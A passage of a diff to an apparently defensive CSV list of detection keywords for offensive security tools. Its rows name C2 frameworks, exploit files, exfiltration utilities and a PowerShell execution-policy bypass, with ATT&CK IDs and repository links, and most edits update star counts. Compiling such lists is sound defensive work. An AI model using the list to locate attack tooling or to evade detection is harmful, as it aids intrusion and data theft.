- T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","1","N/A","10","10","1581","306","2023-09-26T14:00:33Z","2020-07-22T09:45:52Z" -"*execute-shellcode.py*","offensive_tool_keyword","mythic","Cross-platform post-exploitation HTTP Command & Control agent written in golang","T1021 - T1021.002 - T1024 - T1027 - 
T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/merlin","1","1","N/A","10","10","57","10","2023-08-11T15:02:23Z","2021-01-25T12:36:46Z" +"*execute-shellcode.py*","offensive_tool_keyword","mythic","Cross-platform post-exploitation HTTP Command & Control agent written in golang","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/merlin","1","1","N/A","10","10","58","10","2023-08-11T15:02:23Z","2021-01-25T12:36:46Z" "*Execution_CommandAndScriptingInterpreter_UploadAndExec.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" "*Execution_UserExecution_CallbackCreateThreadpoolWait.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" 
"*Execution_UserExecution_CallbackCreateTimerQueue.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" 
@@ -10061,8 +10212,8 @@
 "*Execution_UserExecution_NtCreateSection.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z"
 "*Execution_UserExecution_Syscall_inject.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z"
 "*Execution_UserExecution_VSSyscallProject.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z"
-"*-ExecutionPolicy Bypass -File Win10.ps1 *","offensive_tool_keyword","commando-vm","CommandoVM - a fully customizable Windows-based security distribution for penetration testing and red teaming.","T1059 - T1053 - T1055 - T1070","TA0002 - TA0004 - TA0008","N/A","N/A","Exploitation OS","https://github.com/mandiant/commando-vm","1","0","N/A","N/A","10","6323","1248","2023-10-03T19:02:49Z","2019-03-26T22:36:32Z"
-"*-ExecutionPolicy Bypass -File Win11.ps1 *","offensive_tool_keyword","commando-vm","CommandoVM - a fully customizable Windows-based security distribution for penetration testing and red teaming.","T1059 - T1053 - T1055 - T1070","TA0002 - TA0004 - TA0008","N/A","N/A","Exploitation OS","https://github.com/mandiant/commando-vm","1","0","N/A","N/A","10","6323","1248","2023-10-03T19:02:49Z","2019-03-26T22:36:32Z"
+"*-ExecutionPolicy Bypass -File Win10.ps1 *","offensive_tool_keyword","commando-vm","CommandoVM - a fully customizable Windows-based security distribution for penetration testing and red teaming.","T1059 - T1053 - T1055 - T1070","TA0002 - TA0004 - TA0008","N/A","N/A","Exploitation OS","https://github.com/mandiant/commando-vm","1","0","N/A","N/A","10","6326","1249","2023-10-03T19:02:49Z","2019-03-26T22:36:32Z"
+"*-ExecutionPolicy Bypass -File Win11.ps1 *","offensive_tool_keyword","commando-vm","CommandoVM - a fully customizable Windows-based security distribution for penetration testing and red teaming.","T1059 - T1053 - T1055 - T1070","TA0002 - TA0004 - TA0008","N/A","N/A","Exploitation OS","https://github.com/mandiant/commando-vm","1","0","N/A","N/A","10","6326","1249","2023-10-03T19:02:49Z","2019-03-26T22:36:32Z"
 "*exegol4thewin*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
 "*ExegolController.py*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
 "*exegol-docker-build*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
@@ -10072,22 +10223,22 @@ "*ExegolProgress.py*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*ExegolPrompt.py*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*ExeStager.csproj*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" -"*ExeToInjectInTo.*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" -"*ExeToLaunch StringToBePutAsCmdline*","offensive_tool_keyword","FakeCmdLine","Simple demonstration (C source code and compiled .exe) of a less-known (but documented) behavior of CreateProcess() function. 
Effectively you can put any string into the child process Command Line field.","T1059 - T1036","TA0003","N/A","N/A","Defense Evasion","https://github.com/gtworek/PSBits/tree/master/FakeCmdLine","1","0","N/A","N/A","10","2669","471","2023-09-28T06:10:58Z","2019-06-29T13:22:36Z" -"*ExetoText.ps1*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7849","2360","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" -"*ExfilDataToGitHub*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-ExfilDataToGitHub.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*ExfilDataToGitHub*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1140","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*ExeToInjectInTo.*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*ExeToLaunch StringToBePutAsCmdline*","offensive_tool_keyword","FakeCmdLine","Simple demonstration (C source code and compiled .exe) of a less-known (but documented) behavior of CreateProcess() function. 
Effectively you can put any string into the child process Command Line field.","T1059 - T1036","TA0003","N/A","N/A","Defense Evasion","https://github.com/gtworek/PSBits/tree/master/FakeCmdLine","1","0","N/A","N/A","10","2670","471","2023-09-28T06:10:58Z","2019-06-29T13:22:36Z" +"*ExetoText.ps1*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*ExfilDataToGitHub*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-ExfilDataToGitHub.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*ExfilDataToGitHub*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1140","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Exfil-EC266392-D6BC-4F7B-A4D1-410166D30B55.json*","offensive_tool_keyword","power-pwn","An offensive and defensive security toolset for Microsoft 365 Power Platform","T1078 - T1078.004 - T1136 - T1136.001 - T1021 - T1021.003 - T1114 - T1114.002","TA0003 - TA0004 - TA0005 - TA0001","N/A","N/A","Exploitation tools","https://github.com/mbrg/power-pwn","1","1","N/A","10","4","360","34","2023-09-12T12:44:44Z","2022-06-14T11:40:21Z" "*exfiltrate_via_post.exe*","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - 
TA0010","N/A","N/A","Exploitation tools","https://github.com/reveng007/Executable_Files","1","1","N/A","10","1","7","2","2023-09-07T08:36:28Z","2021-12-10T15:04:35Z" -"*Exfiltration from DNS finished!*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","30","2","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" -"*Exfiltration from HTTPS finished!*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","30","2","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" -"*Exfiltration.tests.ps1*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" -"*existing_auto_target.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. 
and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*Exfiltration from DNS finished!*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","31","3","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" +"*Exfiltration from HTTPS finished!*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","31","3","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" +"*Exfiltration.tests.ps1*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*existing_auto_target.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. 
and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*exit_nimbo*","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","1","N/A","10","10","234","35","2023-10-01T08:09:18Z","2022-10-08T19:02:58Z" "*--expected Bad --expected-stop Welcome*","offensive_tool_keyword","bropper","An automatic Blind ROP exploitation tool ","T1068 - T1059.003 - T1140","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Hakumarachi/Bropper","1","0","N/A","7","2","175","18","2023-06-09T12:40:05Z","2023-01-20T14:09:19Z" "*expl-bin*","offensive_tool_keyword","expl-bin","some of my modified exploits and some scripts.","T1210.001 - T1201 - T1059","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/sailay1996/expl-bin","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" 
-"*explib2_ie11_exec_test_case.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*exploit*wordpress_add_admin*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8794","2027","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*explib2_ie11_exec_test_case.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. 
and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*exploit*wordpress_add_admin*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" "*exploit.bash*","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/lcashdol/Exploits","1","0","N/A","N/A","3","209","75","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z" "*exploit.bat*","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/lcashdol/Exploits","1","0","N/A","N/A","3","209","75","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z" "*exploit.bin*","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/lcashdol/Exploits","1","0","N/A","N/A","3","209","75","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z" 
@@ -10106,42 +10257,42 @@ "*exploit.vbs*","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1543 - T1588 - T1211 - T1203","TA0002 - TA0009","N/A","N/A","Exploitation tools","https://github.com/lcashdol/Exploits","1","1","N/A","N/A","3","209","75","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z" "*exploit.vbscript*","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/lcashdol/Exploits","1","0","N/A","N/A","3","209","75","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z" "*exploit.zsh*","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/lcashdol/Exploits","1","0","N/A","N/A","3","209","75","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z" -"*exploit_frameworks.py*","offensive_tool_keyword","hackingtool","ALL IN ONE Hacking Tool For Hackers","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/Z4nzu/hackingtool","1","1","N/A","N/A","10","39264","4347","2023-09-13T19:08:33Z","2020-04-11T09:21:31Z" +"*exploit_frameworks.py*","offensive_tool_keyword","hackingtool","ALL IN ONE Hacking Tool For Hackers","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/Z4nzu/hackingtool","1","1","N/A","N/A","10","39278","4350","2023-09-13T19:08:33Z","2020-04-11T09:21:31Z" "*exploit_fuse.c*","offensive_tool_keyword","POC","This repo contains demo exploits for CVE-2022-0185","T1210 - T1222 - T1506 - T1068","TA0002 - TA0007 - TA0040","N/A","N/A","Exploitation 